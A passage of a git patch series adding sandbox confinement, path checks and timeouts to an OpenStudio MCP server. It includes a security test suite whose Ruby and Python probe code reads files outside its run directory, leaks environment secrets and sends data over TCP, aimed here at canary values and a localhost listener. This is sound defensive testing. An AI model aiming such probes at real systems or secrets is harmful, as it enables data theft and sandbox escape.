         getter = "String" if atype == "Choice" else _ARG_MAKERS.get(atype, "String")
@@ -194,7 +205,7 @@ def _generate_python_extraction(args: list[dict]) -> str:
     """Generate Python argument extraction lines for run() method."""
     lines = []
     for a in args:
-        name = a["name"]
+        name = _checked_arg_name(a["name"])
         atype = a.get("type", "String")
         # Choice args are extracted as strings at runtime
         getter = "String" if atype == "Choice" else _ARG_MAKERS.get(atype, "String")
@@ -477,6 +488,10 @@ def _update_measure_xml(measure_dir: Path, language: str):
     """
     if language != "Ruby":
         return
+    # NOTE: `measure -u` only executes the GENERATED arguments() method (built from
+    # validated/escaped arg specs — see _checked_arg_name / _escape_*), NOT the
+    # LLM's run_body. So it is not untrusted code and is not sandbox-wrapped here
+    # (wrapping it as the sandbox uid breaks the in-place measure.xml rewrite).
     try:
         subprocess.run(
             ["openstudio", "measure", "-u", str(measure_dir)],
@@ -926,11 +941,13 @@ def _test_reporting_measure_with_run(
         "run", "--postprocess_only", "-w", str(osw_path),
     ]
     log_path = run_dir / "openstudio.log"
+    run_env = sandbox.build_env(run_dir)
+    sandbox.prepare_workdir(run_dir)
     with log_path.open("w", encoding="utf-8") as log_f:
         proc = subprocess.run(
-            cmd, cwd=str(run_dir),
+            sandbox.wrap_cmd(cmd, run_dir), cwd=str(run_dir),
             stdout=log_f, stderr=subprocess.STDOUT,
-            env=os.environ.copy(), timeout=120, check=False,
+            env=run_env, timeout=120, check=False,
         )
 
     log_text = log_path.read_text(encoding="utf-8", errors="replace")
@@ -982,6 +999,14 @@ def test_measure_op(
         mdir = Path(measure_dir)
         if not mdir.is_dir():
             return {"ok": False, "error": f"Measure directory not found: {measure_dir}"}
+        # Access control: only test measures from allowed roots, and never stage a
+        # tree with an escaping symlink (test_measure chowns + Landlock-grants this
+        # dir, so an arbitrary path here is a privilege/secret-disclosure vector).
+        if not is_path_allowed(mdir):
+            return {"ok": False, "error": f"Measure directory not allowed: {measure_dir}"}
+        err = reject_escaping_symlinks(mdir)
+        if err:
+            return {"ok": False, "error": err}
 
         # Detect language
         if (mdir / "measure.py").is_file():
@@ -1006,6 +1031,8 @@ def test_measure_op(
         src_model = None
         if model_path:
             src = Path(model_path)
+            if not is_path_allowed(src):
+                return {"ok": False, "error": f"model_path not allowed: {model_path}"}
             if src.is_file():
                 src_model = src
         if not src_model:
@@ -1014,23 +1041,33 @@ def test_measure_op(
             shutil.copy2(str(src_model), str(test_model_dst))
 
         if language == "Python":
-            proc = subprocess.run(
-                ["python3", "-m", "pytest", "tests/", "-v", "--tb=short"],
-                cwd=str(mdir),
-                env=sandbox.build_env(mdir, redirect_tmp=False),
-                capture_output=True, text=True, timeout=60, check=False,
-            )
+            test_cmd = ["python3", "-m", "pytest", "tests/", "-v", "--tb=short"]
         else:
             # Run minitest directly (openstudio measure -r doesn't run minitest)
             test_files = list(test_dir.glob("*_test.rb"))
             if not test_files:
                 return {"ok": False, "error": "No Ruby test files found"}
+            test_cmd = ["ruby", "-I", ".", str(test_files[0])]
+
+        # Run the (untrusted) test code under the SAME confinement as apply_measure
+        # — UID drop, rlimits, Landlock, seccomp net-deny. TMPDIR is a private dir
+        # under the in-container /tmp (NOT mdir, which is on the Docker bind mount):
+        # pytest's capture uses an unlinked tempfile the bind mount can't keep open.
+        # It's granted to Landlock as an extra writable root and HOME stays in mdir.
+        tmp_dir = Path(tempfile.mkdtemp(prefix="osmcp_mtest_"))
+        try:
+            env = sandbox.build_env(mdir)          # HOME=mdir (granted rw)
+            env["TMPDIR"] = str(tmp_dir)           # off the bind mount, Landlock-granted below
+            sandbox.prepare_workdir(mdir)
+            sandbox.prepare_workdir(tmp_dir)
             proc = subprocess.run(
-                ["ruby", "-I", ".", str(test_files[0])],
+                sandbox.wrap_cmd(test_cmd, mdir, extra_rw=(str(tmp_dir),)),
                 cwd=str(mdir),
-                env=sandbox.build_env(mdir, redirect_tmp=False),
+                env=env,
                 capture_output=True, text=True, timeout=60, check=False,
             )
+        finally:
+            shutil.rmtree(tmp_dir, ignore_errors=True)
 
         output = proc.stdout + proc.stderr
         passed = failed = errors = 0

From bfe7d21a75970d63b5432f143c35fcab7e6c39be Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:40:53 -0400
Subject: [PATCH 14/26] feat(security): enforce OSMCP_SIM_TIMEOUT_SECONDS;
 validate run_simulation inputs; reject escaping OSW symlinks (Copilot+Codex
 C4)

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/skills/simulation/operations.py | 53 +++++++++++++++++++++-
 tests/test_sim_queue.py                    | 34 ++++++++++++++
 2 files changed, 86 insertions(+), 1 deletion(-)

diff --git a/mcp_server/skills/simulation/operations.py b/mcp_server/skills/simulation/operations.py
index df8de0e..3b4bb24 100644
--- a/mcp_server/skills/simulation/operations.py
+++ b/mcp_server/skills/simulation/operations.py
@@ -24,10 +24,12 @@
     MAX_CONCURRENCY_PER_USER,
     OSCLI_GEM_PATH,
     OSCLI_GEMFILE,
+    SIM_TIMEOUT_SECONDS,
+    is_path_allowed,
     user_run_root,
 )
 from mcp_server.identity import user_key
-from mcp_server.util import resolve_run_dir
+from mcp_server.util import reject_escaping_symlinks, resolve_run_dir
 
 # Where the MCP server stores runs inside the container
 DEFAULT_LOG_TAIL = LOG_TAIL_DEFAULT
@@ -322,8 +324,46 @@ def _dispatch_once() -> None:
                 _queue.remove(run_id)
 
 
+def _enforce_timeouts() -> None:
+    """Terminate running sims past the wall-clock cap and mark them failed.
+
+    OSMCP_SIM_TIMEOUT_SECONDS=0 disables. The kill (terminate -> wait -> kill)
+    runs outside _sim_lock so a slow exit can't stall the dispatcher.
+    """
+    if SIM_TIMEOUT_SECONDS <= 0:
+        return
+    now = _now()
+    with _sim_lock:
+        expired = [
+            rec for rec in _RUNS.values()
+            if rec.status == "running" and rec.pid is not None
+            and rec.started_at is not None
+            and now - rec.started_at > SIM_TIMEOUT_SECONDS
+        ]
+    for rec in expired:
+        with contextlib.suppress(psutil.NoSuchProcess, Exception):
+            p = psutil.Process(rec.pid)
+            p.terminate()
+            try:
+                p.wait(timeout=5)
+            except psutil.TimeoutExpired:
+                p.kill()
+        with _sim_lock:
+            rec.status = "failed"
+            rec.ended_at = _now()
+            rec.exit_code = -1 if rec.exit_code is None else rec.exit_code
+            rec.error = (f"Simulation exceeded the {SIM_TIMEOUT_SECONDS:.0f}s wall-clock "
+                         "cap (OSMCP_SIM_TIMEOUT_SECONDS)")
+            _RUNS[rec.run_id] = rec
+        _persist_run_record(rec)
+        audit("sim_timeout", run_id=rec.run_id, user=rec.user_key,
+              ran_seconds=round(now - (rec.started_at or now), 1))
+
+
 def _dispatch_loop() -> None:
     while True:
+        with contextlib.suppress(Exception):
+            _enforce_timeouts()
         with contextlib.suppress(Exception):
             _dispatch_once()
         time.sleep(0.5)
@@ -357,6 +397,13 @@ def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None)
     src_osw = Path(osw_path).resolve()
     if not src_osw.exists():
         return {"ok": False, "error": f"OSW not found: {osw_path}"}
+    # An OSW bundle may legitimately live anywhere (e.g. a temp staging dir), so we
+    # don't is_path_allowed the OSW path itself — but we must never FOLLOW a symlink
+    # in its tree that escapes the bundle (would copy a host file into the run dir).
+    # User-facing entry points (run_simulation) validate their inputs separately.
+    sym_err = reject_escaping_symlinks(src_osw.parent)
+    if sym_err:
+        return {"ok": False, "error": sym_err}
 
     # Fail fast on invalid OSW (before staging any run dir)
     v = validate_osw(str(src_osw), epw_path=epw_path)
@@ -748,6 +795,8 @@ def run_simulation(osm_path: str, epw_path: str | None = None, name: str | None
     osm = Path(osm_path)
     if not osm.exists():
         return {"ok": False, "error": f"OSM file not found: {osm_path}"}
+    if not is_path_allowed(osm):
+        return {"ok": False, "error": f"OSM path not allowed: {osm_path}"}
 
     # Validate EPW path upfront if provided
     epw_abs: str | None = None
@@ -755,6 +804,8 @@ def run_simulation(osm_path: str, epw_path: str | None = None, name: str | None
         epw = Path(epw_path)
         if not epw.exists():
             return {"ok": False, "error": f"EPW file not found: {epw_path}"}
+        if not is_path_allowed(epw):
+            return {"ok": False, "error": f"EPW path not allowed: {epw_path}"}
         epw_abs = str(epw.resolve())
 
     # Stage the minimal OSW in a throwaway temp dir. run_osw() copies the staged
diff --git a/tests/test_sim_queue.py b/tests/test_sim_queue.py
index 03ed284..2227288 100644
--- a/tests/test_sim_queue.py
+++ b/tests/test_sim_queue.py
@@ -86,6 +86,40 @@ async def _run():
         asyncio.run(_run())
 
 
+@pytest.mark.integration
+def test_sim_timeout_kills_long_run():
+    # Validates: OSMCP_SIM_TIMEOUT_SECONDS caps wall-clock — a sim that exceeds it
+    # is terminated and marked failed with a timeout error (runaway/DoS guard). A
+    # 2s cap fires long before the example-model sim could ever finish.
+    if not integration_enabled():
+        pytest.skip("Set RUN_OPENSTUDIO_INTEGRATION=1 to enable integration tests.")
+
+    with http_server({"MCP_AUTH": "none", "OSMCP_SIM_TIMEOUT_SECONDS": "2"}) as (url, _proc):
+        async def _run():
+            async with http_session(url) as s:
+                cr = unwrap(await s.call_tool(
+                    "create_example_osm", {"name": f"to_{uuid.uuid4().hex[:8]}"}))
+                assert cr["ok"] is True, cr
+                rs = unwrap(await s.call_tool(
+                    "run_simulation", {"osm_path": cr["osm_path"], "epw_path": EPW_PATH}))
+                assert rs["ok"] is True, rs
+                run_id = rs["run_id"]
+
+                status, err = rs["status"], ""
+                for _ in range(120):  # up to 60s; the 2s cap fires far sooner
+                    run = unwrap(await s.call_tool("get_run_status", {"run_id": run_id}))["run"]
+                    status, err = run["status"], (run.get("error") or "")
+                    if status in ("success", "failed", "cancelled", "error"):
+                        break
+                    await asyncio.sleep(0.5)
+
+                assert status == "failed", f"timed-out sim must be 'failed', got {status!r}"
+                assert "cap" in err.lower() or "exceeded" in err.lower(), \
+                    f"error should indicate the wall-clock timeout; got {err!r}"
+
+        asyncio.run(_run())
+
+
 @pytest.mark.integration
 def test_cancelled_running_sim_stays_cancelled():
     # Regression: _refresh_status reclassified a cancelled (running) run as "failed"

From ae9a01cf7bb162fec62adee9d993744837155502 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:54:46 -0400
Subject: [PATCH 15/26] test(security): publish sandbox confinement suite + run
 it in CI

Vulnerabilities are fixed (this PR), so the PoC suite is no longer held back. Runs in the dedicated security.yml workflow under OSMCP_SANDBOX=auto (each test still pins its own tier). Reports how Landlock+seccomp behave on the GitHub runner.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 .github/workflows/security.yml |  24 +-
 tests/test_sandbox.py          | 734 +++++++++++++++++++++++++++++++++
 2 files changed, 747 insertions(+), 11 deletions(-)
 create mode 100644 tests/test_sandbox.py

diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml
index 8f87f81..c3688e1 100644
--- a/.github/workflows/security.yml
+++ b/.github/workflows/security.yml
@@ -1,15 +1,16 @@
 name: security
 
-# Dedicated workflow for the security / sandbox-confinement suite, kept separate
-# from the main `ci` shards so security tests live on their own.
-#
-# Manual-trigger only. The working exploit PoC (tests/test_sandbox.py) is
-# deliberately kept OUT of the public repo (see .git/info/exclude) until the
-# sandbox fix ships, so on a clean GitHub checkout this suite is a safe no-op —
-# it runs only where the security tests are actually present (local / self-hosted
-# checkout, or once the blocked-assertion suite is published).
+# Dedicated workflow for the security / sandbox-confinement suite
+# (tests/test_sandbox.py), kept separate from the main `ci` shards so the
+# security tests run and report on their own. Runs the full sandbox tier
+# (OSMCP_SANDBOX=auto); individual tests still pin their own mode per fixture
+# (off/posix/auto), so this exercises every tier and reports how the kernel
+# backends (Landlock + seccomp) behave on the GitHub runner.
 
 on:
+  push:
+    branches: [feat/measure-exec-sandbox]
+  pull_request:
   workflow_dispatch:
 
 jobs:
@@ -25,14 +26,15 @@ jobs:
         env:
           RUN_OPENSTUDIO_INTEGRATION: "1"
           MCP_SERVER_CMD: "openstudio-mcp"
+          OSMCP_SANDBOX: "auto"
         run: |
           mkdir -p runs
           FILES=$(ls tests/test_sandbox.py tests/test_security_*.py 2>/dev/null || true)
           if [ -z "$FILES" ]; then
-            echo "No security tests present in this checkout (PoC kept local) — nothing to run."
+            echo "No security tests present in this checkout — nothing to run."
             exit 0
           fi
-          echo "Running security tests: $FILES"
+          echo "Running security tests under OSMCP_SANDBOX=$OSMCP_SANDBOX: $FILES"
           docker run --rm -v "$PWD:/repo" -v "$PWD/runs:/runs" \
-            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD \
+            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \
             openstudio-mcp:dev bash -lc "cd /repo && pytest -vv $FILES"
diff --git a/tests/test_sandbox.py b/tests/test_sandbox.py
new file mode 100644
index 0000000..d97591c
--- /dev/null
+++ b/tests/test_sandbox.py
@@ -0,0 +1,734 @@
+"""Confirm the measure-exec vulnerabilities that the sandbox (planned) will close.
+
+Context: docs/plans/measure-exec-sandbox.md. Today an applied measure runs as
+root, with the server's full environment, unconfined filesystem, and open
+network — see skills/measures/operations.py (`env=os.environ.copy()`, no UID
+drop, no FS policy). These tests PROVE each hole exists, safely, using canaries
+and decoys only (no real secret/file/host is touched, nothing leaves the box).
+
+Design — "prove the problem exists now" half of the dual-run plan:
+  - Server is spawned with OSMCP_SANDBOX=off, so these document the explicit
+    passthrough/escape-hatch behaviour and remain valid once the sandbox lands
+    (off = full passthrough, by design — the Codex `danger-full-access` model).
+  - Each probe attempts an attack and reports via runner.registerInfo("PROBE ...").
+    The AUTHORITATIVE check is external ground truth (escape file on disk, bytes
+    the listener received, the uid value), not just the measure's self-report.
+
+Fix increment 1 has landed (clean-env floor + unconditional measure_dir check):
+  - test_measure_exec_unconfined_today (OSMCP_SANDBOX=off) still proves all five
+    holes — off is a true passthrough by design.
+  - test_clean_env_blocks_secret_leak (OSMCP_SANDBOX=posix) proves the env-secret
+    leak is closed and a normal run still succeeds (allowlist complete enough).
+  - test_measure_dir_traversal_blocked proves arbitrary out-of-root measure paths
+    are rejected (check is unconditional, not gated by OSMCP_SANDBOX).
+Fix increment 2 (UID drop + rlimits) and increment 3 (Landlock FS + seccomp
+net-deny) have landed:
+  - test_posix_drops_root_and_applies_rlimits — uid 1001, NPROC rlimit, DAC blocks
+    a root-owned write (OSMCP_SANDBOX=posix).
+  - test_full_tier_blocks_read_escape_and_network — Landlock blocks reading a
+    world-readable file outside the run dir, blocks writing outside it, and
+    seccomp blocks outbound IP networking (OSMCP_SANDBOX=auto), while the run
+    still succeeds.
+With the full tier, all five holes are closed; off remains a true passthrough.
+
+Safety notes:
+  - Decoys live under RUN_ROOT / a tmpdir on the disposable runs volume and are
+    deleted in finally blocks.
+  - The network probe targets a localhost listener owned by this test process,
+    inside the same container — no traffic leaves the machine.
+"""
+import asyncio
+import os
+import shutil
+import socket
+import subprocess
+import sys
+import tempfile
+import textwrap
+import threading
+import uuid
+from pathlib import Path
+
+import pytest
+from conftest import (
+    EPW_PATH,
+    http_server,
+    http_session,
+    integration_enabled,
+    setup_example,
+    unwrap,
+)
+
+pytestmark = pytest.mark.integration
+
+RUN_ROOT = Path(
+    os.environ.get("OPENSTUDIO_MCP_RUN_ROOT", os.environ.get("OSMCP_RUN_ROOT", "/runs")),
+)
+_FIXTURE_MEASURE = Path(__file__).parent / "assets" / "measures" / "set_building_name"
+
+# Each probe attempts one attack and registers a "PROBE <name>=<value>" line.
+# victim_path / escape_path / net_target are passed as measure arguments, so the
+# same measure body exercises all five holes in a single `openstudio run`.
+_RB_PROBE_BODY = """
+require 'socket'
+runner.registerInfo("PROBE uid=#{Process.uid}")
+runner.registerInfo("PROBE nproc=#{Process.getrlimit(:NPROC)[0]}")
+runner.registerInfo("PROBE env=#{ENV['OSMCP_CANARY_SECRET'] || '<absent>'}")
+begin
+  runner.registerInfo("PROBE read=#{File.read(victim_path).strip}")
+rescue => e
+  runner.registerInfo("PROBE read_err=#{e.class}")
+end
+begin
+  File.write(escape_path, "ESCAPED")
+  runner.registerInfo("PROBE wrote=#{escape_path}")
+rescue => e
+  runner.registerInfo("PROBE write_err=#{e.class}")
+end
+begin
+  host, port = net_target.split(":")
+  s = TCPSocket.new(host, port.to_i)
+  s.write("CANARY_EXFIL")
+  s.close
+  runner.registerInfo("PROBE net=sent")
+rescue => e
+  runner.registerInfo("PROBE net_err=#{e.class}")
+end
+"""
+
+_PY_PROBE_BODY = """
+import os
+import socket
+import resource
+runner.registerInfo("PROBE uid=%d" % os.getuid())
+runner.registerInfo("PROBE nproc=%d" % resource.getrlimit(resource.RLIMIT_NPROC)[0])
+runner.registerInfo("PROBE env=%s" % os.environ.get("OSMCP_CANARY_SECRET", "<absent>"))
+try:
+    with open(victim_path) as f:
+        runner.registerInfo("PROBE read=%s" % f.read().strip())
+except Exception as e:
+    runner.registerInfo("PROBE read_err=%s" % type(e).__name__)
+try:
+    with open(escape_path, "w") as f:
+        f.write("ESCAPED")
+    runner.registerInfo("PROBE wrote=%s" % escape_path)
+except Exception as e:
+    runner.registerInfo("PROBE write_err=%s" % type(e).__name__)
+try:
+    host, port = net_target.split(":")
+    s = socket.create_connection((host, int(port)), timeout=5)
+    s.sendall(b"CANARY_EXFIL")
+    s.close()
+    runner.registerInfo("PROBE net=sent")
+except Exception as e:
+    runner.registerInfo("PROBE net_err=%s" % type(e).__name__)
+"""
+
+_PROBE_ARGS = [
+    {"name": "victim_path", "type": "String", "required": True, "default_value": ""},
+    {"name": "escape_path", "type": "String", "required": True, "default_value": ""},
+    {"name": "net_target", "type": "String", "required": True, "default_value": ""},
+]
+
+
+def _unique(prefix: str = "pytest_sandbox") -> str:
+    return f"{prefix}_{uuid.uuid4().hex[:10]}"
+
+
+def _probe_body(language: str) -> str:
+    """Indent the probe body to the base indent create_measure injects at."""
+    if language == "Ruby":
+        return textwrap.indent(textwrap.dedent(_RB_PROBE_BODY).strip("\n"), "    ")
+    return textwrap.indent(textwrap.dedent(_PY_PROBE_BODY).strip("\n"), "        ")
+
+
+class _CanaryListener:
+    """Localhost TCP listener that records the first payload it receives.
+
+    Owned by the test process, bound to 127.0.0.1 inside the container — the
+    measure subprocess connects to it; nothing leaves the machine.
+    """
+
+    def __init__(self):
+        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        self.sock.bind(("127.0.0.1", 0))
+        self.sock.listen(1)
+        self.sock.settimeout(30)
+        self.port = self.sock.getsockname()[1]
+        self.received = b""
+        self._thread = threading.Thread(target=self._serve, daemon=True)
+
+    def start(self):
+        self._thread.start()
+
+    def _serve(self):
+        try:
+            conn, _ = self.sock.accept()
+            with conn:
+                conn.settimeout(5)
+                self.received = conn.recv(1024)
+        except OSError:
+            pass
+        finally:
+            self.sock.close()
+
+    def close(self):
+        try:
+            self.sock.close()
+        except OSError:
+            pass
+
+
+@pytest.fixture(scope="module")
+def sandbox_server():
+    """One HTTP server for the module, with a fake canary secret in its env.
+
+    OSMCP_SANDBOX=off pins the current unconfined passthrough so these stay valid
+    once the sandbox exists. The canary is a fake value — never a real credential.
+    """
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    canary = f"do-not-leak-{uuid.uuid4().hex[:8]}"
+    with http_server({
+        "MCP_AUTH": "none",
+        "OSMCP_SANDBOX": "off",
+        "OSMCP_CANARY_SECRET": canary,
+    }) as (url, _proc):
+        yield url, canary
+
+
+@pytest.fixture(scope="module")
+def confined_server():
+    """An HTTP server with the POSIX floor on (OSMCP_SANDBOX=posix)."""
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    canary = f"do-not-leak-{uuid.uuid4().hex[:8]}"
+    with http_server({
+        "MCP_AUTH": "none",
+        "OSMCP_SANDBOX": "posix",
+        "OSMCP_CANARY_SECRET": canary,
+    }) as (url, _proc):
+        yield url, canary
+
+
+@pytest.fixture(scope="module")
+def full_server():
+    """An HTTP server with the full tier (OSMCP_SANDBOX=auto: posix + Landlock + seccomp)."""
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    canary = f"do-not-leak-{uuid.uuid4().hex[:8]}"
+    with http_server({
+        "MCP_AUTH": "none",
+        "OSMCP_SANDBOX": "auto",
+        "OSMCP_CANARY_SECRET": canary,
+    }) as (url, _proc):
+        yield url, canary
+
+
+@pytest.fixture(scope="module")
+def net_allow_server():
+    """Full tier but with the network deny opted out (OSMCP_SANDBOX_NET=allow)."""
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    with http_server({
+        "MCP_AUTH": "none",
+        "OSMCP_SANDBOX": "auto",
+        "OSMCP_SANDBOX_NET": "allow",
+    }) as (url, _proc):
+        yield url
+
+
+async def _create_probe_measure(session, language: str) -> str:
+    res = unwrap(await session.call_tool("create_measure", {
+        "name": _unique("sandbox_probe_" + ("rb" if language == "Ruby" else "py")),
+        "description": "Sandbox vulnerability probe (test fixture).",
+        "run_body": _probe_body(language),
+        "language": language,
+        "arguments": _PROBE_ARGS,
+    }))
+    assert res.get("ok") is True, f"create_measure failed: {res}"
+    return res["measure_dir"]
+
+
+@pytest.mark.parametrize("language", ["Ruby", "Python"])
+def test_measure_exec_unconfined_today(language, sandbox_server):
+    # Validates: an applied measure today runs as root, sees the server's secret
+    # env, reads outside its run dir, writes outside its run dir, and opens the
+    # network — the five holes the sandbox must close. Proven safely via canaries.
+    url, canary = sandbox_server
+    tag = uuid.uuid4().hex[:8]
+    victim_secret = f"VICTIM_SECRET_{tag}"
+    victim_dir = RUN_ROOT / f"_decoy_victim_{tag}"
+    victim_dir.mkdir(parents=True, exist_ok=True)
+    victim_file = victim_dir / "secret.txt"
+    victim_file.write_text(victim_secret, encoding="utf-8")
+    escape_file = RUN_ROOT / f"_decoy_escape_{tag}.txt"
+    listener = _CanaryListener()
+    listener.start()
+
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                # --- Arrange ---
+                await setup_example(s, _unique())
+                measure_dir = await _create_probe_measure(s, language)
+
+                # --- Act ---
+                res = unwrap(await s.call_tool("apply_measure", {
+                    "measure_dir": measure_dir,
+                    "arguments": {
+                        "victim_path": str(victim_file),
+                        "escape_path": str(escape_file),
+                        "net_target": f"127.0.0.1:{listener.port}",
+                    },
+                }))
+                assert res.get("ok") is True, f"apply_measure failed: {res}"
+                return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+        info = asyncio.run(_run())
+
+        # --- Assert: each hole is real ---
+        # 1. Runs as root — no privilege drop.
+        assert "PROBE uid=0" in info, \
+            f"measure should run as root (uid 0) today; info=\n{info}"
+        # 2. Server's secret env leaks into the measure (os.environ.copy()).
+        assert f"PROBE env={canary}" in info, \
+            f"canary secret should leak into measure env today; info=\n{info}"
+        # 3. Reads a file outside its run dir (another run's area).
+        assert f"PROBE read={victim_secret}" in info, \
+            f"measure should read the decoy victim file today; info=\n{info}"
+        # 4. Writes a file outside its run dir — ground truth: file on disk.
+        assert "PROBE wrote=" in info, f"measure should report a write; info=\n{info}"
+        assert escape_file.is_file() and escape_file.read_text() == "ESCAPED", \
+            "measure should write outside its run dir today (escape file on disk)"
+        # 5. Opens the network — ground truth: listener received the payload.
+        assert "PROBE net=sent" in info, f"measure should report net send; info=\n{info}"
+        listener._thread.join(timeout=5)
+        assert listener.received == b"CANARY_EXFIL", \
+            f"localhost listener should receive exfil today; got {listener.received!r}"
+    finally:
+        listener.close()
+        shutil.rmtree(victim_dir, ignore_errors=True)
+        escape_file.unlink(missing_ok=True)
+
+
+def test_measure_dir_traversal_blocked(sandbox_server):
+    # Regression: apply_measure must reject a measure_dir outside all allowed
+    # roots (own run area / shared read roots), closing the traversal hole where
+    # any /tmp path holding a measure.rb was copied and executed. The check is
+    # unconditional (not gated by OSMCP_SANDBOX), so it holds even with sandbox off.
+    url, _canary = sandbox_server
+    outside_dir = Path(tempfile.mkdtemp(prefix="osmcp_decoy_measure_"))
+    decoy_measure = outside_dir / "set_building_name"
+    shutil.copytree(_FIXTURE_MEASURE, decoy_measure)
+
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                # --- Arrange ---
+                await setup_example(s, _unique())
+                # --- Act ---
+                return unwrap(await s.call_tool("apply_measure", {
+                    "measure_dir": str(decoy_measure),
+                    "arguments": {"building_name": "Traversal Test"},
+                }))
+
+        res = asyncio.run(_run())
+
+        # --- Assert: out-of-root measure path is refused before any execution ---
+        assert res.get("ok") is False, \
+            f"apply_measure must reject a measure_dir outside allowed roots; got {res}"
+        assert "not allowed" in str(res.get("error", "")).lower(), \
+            f"error should explain the path is not allowed; got {res.get('error')}"
+    finally:
+        shutil.rmtree(outside_dir, ignore_errors=True)
+
+
+@pytest.mark.parametrize("language", ["Ruby", "Python"])
+def test_clean_env_blocks_secret_leak(language, confined_server):
+    # Validates: OSMCP_SANDBOX=posix strips the server's secret env via the
+    # allowlist, so an applied measure no longer sees host secrets — AND a normal
+    # measure run still succeeds, proving the allowlist is complete enough.
+    url, canary = confined_server
+
+    async def _run():
+        async with http_session(url) as s:
+            # --- Arrange ---
+            await setup_example(s, _unique())
+            measure_dir = await _create_probe_measure(s, language)
+            # --- Act ---
+            res = unwrap(await s.call_tool("apply_measure", {
+                "measure_dir": measure_dir,
+                "arguments": {"victim_path": "", "escape_path": "", "net_target": ""},
+            }))
+            assert res.get("ok") is True, f"apply_measure under posix failed: {res}"
+            return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+    info = asyncio.run(_run())
+
+    # --- Assert: canary secret is gone, the run still produced output ---
+    assert "PROBE env=<absent>" in info, \
+        f"clean-env should hide the canary under posix; info=\n{info}"
+    assert canary not in info, \
+        f"canary secret must not appear anywhere under posix; info=\n{info}"
+
+
+@pytest.mark.parametrize("language", ["Ruby", "Python"])
+def test_posix_drops_root_and_applies_rlimits(language, confined_server):
+    # Validates: OSMCP_SANDBOX=posix runs the measure as the unprivileged sandbox
+    # uid (1001), applies the NPROC rlimit, and DAC then denies a write to a
+    # root-owned location outside the run dir (/opt — in-image, not a bind mount,
+    # so ownership is enforced regardless of host). Read/network are NOT yet closed
+    # at this tier (Landlock/seccomp follow) — not asserted here.
+    url, _canary = confined_server
+    tag = uuid.uuid4().hex[:8]
+    escape_file = Path(f"/opt/_sbx_escape_{tag}.txt")  # root-owned, in-image
+
+    async def _run():
+        async with http_session(url) as s:
+            # --- Arrange ---
+            await setup_example(s, _unique())
+            measure_dir = await _create_probe_measure(s, language)
+            # --- Act ---
+            res = unwrap(await s.call_tool("apply_measure", {
+                "measure_dir": measure_dir,
+                "arguments": {
+                    "victim_path": "", "escape_path": str(escape_file), "net_target": "",
+                },
+            }))
+            assert res.get("ok") is True, f"apply_measure under posix failed: {res}"
+            return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+    info = asyncio.run(_run())
+
+    # --- Assert: privilege dropped, rlimit applied, DAC blocks the escape write ---
+    assert "PROBE uid=1001" in info, f"measure should drop to sandbox uid 1001; info=\n{info}"
+    assert "PROBE uid=0" not in info, "measure must not run as root under posix"
+    assert "PROBE nproc=1024" in info, f"NPROC rlimit (1024) should be applied; info=\n{info}"
+    assert "PROBE write_err=" in info, \
+        f"write to root-owned /opt should be denied under posix; info=\n{info}"
+    assert not escape_file.exists(), "DAC must block writing a root-owned out-of-run-dir path"
+
+
+@pytest.mark.parametrize("language", ["Ruby", "Python"])
+def test_full_tier_blocks_read_escape_and_network(language, full_server):
+    # Validates: OSMCP_SANDBOX=auto (Landlock FS + seccomp net-deny on top of the
+    # POSIX floor) blocks reading a world-readable file outside the run dir
+    # (root-owned /opt, not in the read-only allowlist — so DAC alone would NOT
+    # block it; Landlock does), blocks writing outside the run dir, and blocks
+    # outbound IP networking — while the measure run itself still succeeds.
+    url, _canary = full_server
+    tag = uuid.uuid4().hex[:8]
+    victim_secret = f"VICTIM_SECRET_{tag}"
+    victim_file = Path(f"/opt/_sbx_victim_{tag}.txt")   # root-owned, in-image, not allowlisted
+    victim_file.write_text(victim_secret, encoding="utf-8")
+    escape_file = Path(f"/opt/_sbx_escape_{tag}.txt")
+    listener = _CanaryListener()
+    listener.start()
+
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                # --- Arrange ---
+                await setup_example(s, _unique())
+                measure_dir = await _create_probe_measure(s, language)
+                # --- Act ---
+                res = unwrap(await s.call_tool("apply_measure", {
+                    "measure_dir": measure_dir,
+                    "arguments": {
+                        "victim_path": str(victim_file),
+                        "escape_path": str(escape_file),
+                        "net_target": f"127.0.0.1:{listener.port}",
+                    },
+                }))
+                assert res.get("ok") is True, f"apply_measure under full tier failed: {res}"
+                return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+        info = asyncio.run(_run())
+
+        # --- Assert: read escape, write escape, and network all denied ---
+        assert "PROBE read_err=" in info, f"read outside run dir should be denied; info=\n{info}"
+        assert victim_secret not in info, "victim secret must not leak under the full tier"
+        assert "PROBE write_err=" in info, f"write outside run dir should be denied; info=\n{info}"
+        assert not escape_file.exists(), "Landlock must block the out-of-run-dir write"
+        assert "PROBE net_err=" in info, f"outbound network should be denied; info=\n{info}"
+        listener._thread.join(timeout=3)
+        assert listener.received == b"", f"seccomp must block exfil; got {listener.received!r}"
+    finally:
+        listener.close()
+        victim_file.unlink(missing_ok=True)
+        escape_file.unlink(missing_ok=True)
+
+
+def test_landlock_confines_without_root():
+    # Validates: the unprivileged confinement layer (Landlock) applies even when
+    # the shim runs as a NON-root uid — so a local non-root server still confines
+    # measure filesystem access; the uid-drop is simply skipped (no hard fail).
+    # This is what protects a local user, not just the root Docker server.
+    workdir = tempfile.mkdtemp()
+    cmd = [
